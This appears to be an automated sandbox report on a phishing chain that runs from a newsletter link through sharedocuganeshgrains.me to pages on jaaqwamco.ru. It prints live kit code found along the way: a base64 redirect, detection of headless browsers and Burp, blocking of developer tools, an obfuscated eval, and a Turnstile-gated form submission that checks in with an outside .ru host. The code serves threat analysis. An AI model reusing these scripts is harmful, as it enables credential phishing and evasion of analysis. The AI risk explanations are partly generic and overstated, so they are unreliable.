URL: https://link.mail.beehiiv.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://link.mail.beehiiv.com |
URL: https://sharedocuganeshgrains.me/?utm_source=thier... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of potential malicious intent."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f3171d729830f8d',t:'MTczNDM4MTE2Ny4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: https://sharedocuganeshgrains.me/?utm_source=thier... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits high-risk behavior by using obfuscated code to redirect the user to an unknown domain. The use of base64 encoding to hide the destination URL is a common tactic employed in malicious scripts, and the redirection to an untrusted domain (jaaqwamco.ru) is a strong indicator of potential malicious intent."
} |
const base64EncodedURL = 'aHR0cHM6Ly9wa1l2LmphYXF3YW1jby5ydS9TYjNPRWN1Lw==';
// Decode the base64 string and redirect
window.onload = function() {
const decodedURL = atob(base64EncodedURL);
window.location.href = decodedURL;
};
|
URL: https://sharedocuganeshgrains.me/?utm_source=thier... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential attack vector."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f3171af9b414204',t:'MTczNDM4MTE2MS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: https://sharedocuganeshgrains.me/?utm_source=thier... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also sets a persistent cookie with an expiration date in the future, which could be used for malicious purposes like session hijacking or tracking. The script appears to be testing for the presence of various headless browser and automation tools, suggesting it may be attempting to evade detection. Overall, the combination of these behaviors indicates a high-risk, potentially malicious script."
} |
eval(decodeURIComponent(escape('\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x61\x20\x3D\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20\x7B\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x21\x21\x77\x69\x6E\x64\x6F\x77\x2E\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72\x7D\x20\x63\x61\x74\x63\x68\x28\x65\x29\x20\x7B\x72\x65\x74\x75\x72\x6E\x20\x21\x31\x7D\x20\x7D\x2C\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x20\x3D\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x62\x2C\x20\x63\x29\x20\x7B\x61\x28\x29\x20\x3F\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72\x28\x22\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64\x22\x2C\x20\x62\x2C\x20\x63\x29\x20\x3A\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x61\x74\x74\x61\x63\x68\x45\x76\x65\x6E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x6E\x6F\x77\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x74\x69\x6D\x65\x20\x3D\x20\x6E\x6F\x77\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x69\x6D\x65\x20\x2B\x3D\x20\x33\x30\x30\x20\x2A\x20\x31\x30\x30\x30\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6E\x6F\x77\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x74\x69\x6D\x65\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\x27\x4C\x49\x56\x45\x64\x4F\x75\x36\x79\x39\x52\x78\x39\x37\x64\x35\x67\x55\x69\x78\x69\x67\x47\x73\x51\x4B\x34\x3D\x32\x34\x56\x35\x66\x64\x5F\x53\x71\x47\x66\x79\x6E\x43\x73\x48\x6D\x41\x4A\x62\x6C\x39\x79\x53\x6E\x64\x41\x27\x20\x2B\x20\x27\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x54\x75\x65\x2C\x20\x31\x37\x2D\x44\x65\x63\x2D\x32\x34\x20\x32\x30\x3A\x33\x32\x3A\x33\x38\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x70\x75\x7A\x7A\x6C\x65\x20\x66\x6F\x72\x20\x62\x72\x6F\x77\x73\x65\x72\x20\x74\x6F\x20\x66\x69\x67\x75\x72\x65\x20\x6F\x75\x74\x20\x74\x6F\x20\x67\x65\x74\x20\x61\x6E\x73\x77\x65\x72\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x5F\x70\x68\x61\x6E\x74\x6F\x6D\x20\x7C\x7C\x20\x21\x77\x69\x6E\x64\x6F\x77\x2E\x63\x61\x6C\x6C\x50\x68\x61\x6E\x74\x6F\x6D\x29\x7B\x2F\x2A\x70\x68\x61\x6E\x74\x6F\x6D\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x5F\x5F\x70\x68\x61\x6E\x74\x6F\x6D\x61\x73\x29\x7B\x2F\x2A\x70\x68\x61\x6E\x74\x6F\x6D\x61\x73\x20\x50\x68\x61\x6E\x74\x6F\x6D\x4A\x53\x2D\x62\x61\x73\x65\x64\x20\x77\x65\x62\x20\x70\x65\x72\x66\x20\x6D\x65\x74\x72\x69\x63\x73\x20\x2B\x20\x6D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67\x20\x74\x6F\x6F\x6C\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x42\x75\x66\x66\x65\x72\x29\x7B\x2F\x2A\x6E\x6F\x64\x65\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x77\x65\x62\x64\x72\x69\x76\x65\x72\x29\x7B\x2F\x2A\x73\x65\x6C\x65\x6E\x69\x75\x6D\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E |
URL: https://sharedocuganeshgrains.me/?utm_source=thierrys-newsletter-144b09.beehiiv.com&utm_medium=newsletter&utm_campaign=partner-s-project&_bhlid=6bbc94c7009a56b9fb094c87c241a4026f67592f Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://sharedocuganeshgrains.me Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://sharedocuganeshgrains.me |
URL: https://sharedocuganeshgrains.me/?utm_source=thierrys-newsletter-144b09.beehiiv.com&utm_medium=newsletter&utm_campaign=partner-s-project&_bhlid=6bbc94c7009a56b9fb094c87c241a4026f67592f Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a high likelihood of malicious intent, potentially to prevent analysis or hide unwanted activities."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
WtEUaoUKFp = false;
(function HngfBltKya() {
let QpNrtezMtg = false;
const HetceMgZDm = 100;
setInterval(function() {
const gdObVJxASv = performance.now();
debugger;
const WIAGHnWoIp = performance.now();
if (WIAGHnWoIp - gdObVJxASv > HetceMgZDm && !QpNrtezMtg) {
WtEUaoUKFp = true;
QpNrtezMtg = true;
window.location.replace('https://powerbi.microsoft.com');
}
}, 100);
})();
|
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution."
} |
if(atob("aHR0cHM6Ly9wa1l2LmphYXF3YW1jby5ydS9TYjNPRWN1Lw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNHZ1pTVWdKRmhyIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI0dnWlNVZ0pGaHIgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0dnWlNVZ0pGaHIgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojR2daU1VnSkZociBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0dnWlNVZ0pGaHIuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTlweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI0dnWlNVZ0pGaHIgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNHZ1pTVWdKRmhyIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojR2daU1VnSkZociAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNHZ1pTVWdKRmhyIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNHZ1pTVWdKRmhyIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojR2daU1VnSkZociAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojR2daU1VnSkZoci5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI0dnWlNVZ0pGaHIgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNHZ1pTVWdKRmhyICNSdlNPWGRMUURJIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQpXdEVVYW9VS0ZwID0gZmFsc2U7DQooZnVuY3Rpb24gSG5nZkJsdEt5YSgpIHsNCiAgICBsZXQgUXBOcnRlek10ZyA9IGZhbHNlOw0KICAgIGNvbnN0IEhldGNlTWdaRG0gPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IGdkT2JWSnhBU3YgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAg |
URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on cryptographic operations and data manipulation, which are common in legitimate applications. While it uses some legacy practices like the `XDomainRequest` API, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of cryptographic functionality and is likely part of a legitimate application."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
URL: https://pkyv.jaaqwamco.ru/Sb3OEcu/... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a potentially malicious domain upon certain conditions. These behaviors are highly indicative of a malicious script, likely used for phishing or other malicious purposes."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA0MpIT_R9fG8S2s',
'error-callback': hvecCeSvzB,
callback: PQsVXyuLyI,
});
function hvecCeSvzB() {
turnstile.reset();
}
function PQsVXyuLyI() {
var YIPQXDHFxu = document.getElementById("fVXMfjdMaB");
YIPQXDHFxu.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = 'SFyT7t';
var brUgiIhFiH = "../sdoOnUy5KklmtkYTRbbrde";
fetch('https://Uhits17W29p5fEhRDSR1MnejFO76ZTpPV1YyyutAYWfLU7zGZN3zRT.ezmbsgzm.ru/6744366308250798977277105oPjycqXSQBHYAIEVVLSHUNAGKSUSHYZSQGYOXNNPZNXCISYJ', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(brUgiIhFiH, {
method: "POST",
body: new FormData(YIPQXDHFxu)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(WtEUaoUKFp == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://powerbi.microsoft.com');
}
});
}
if(text != 0){
window.location.replace('https://powerbi.microsoft.com');
}
})
.catch(error => {
window.location.replace('https://powerbi.microsoft.com');
});
}
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. While the script contains some obfuscated code and makes use of the Cloudflare API, it does not exhibit any clear signs of malicious behavior. The script is likely legitimate and part of Cloudflare's managed security services. However, the use of obfuscation and the complexity of the script warrant further review to ensure there are no hidden risks or vulnerabilities."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'odxgc',
chlApiSitekey: '0x4AAAAAAA0MpIT_R9fG8S2s',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'BzKZRJaIJGXs1JT8BdF1pLYbfq_09Kz3TDCuM3QJ_8k-1734381177-1.3.1.1-N1zqsH.3HotLOP8smeAmEOKC_zQdD.qA925YBJIcqn0',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f3172179ac67c7b',
cH: 'XvcW7PXPitT.oRL1B4Sdfsa4S2Um.4Q1KsGhubsXJPI-1734381177-1.1.1.1-HwPQzq99Znn1hUobXdybAoQXayOnQ3LqzdOHFCdO27JaAqE5BaNkuBA40Bym7hMk',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
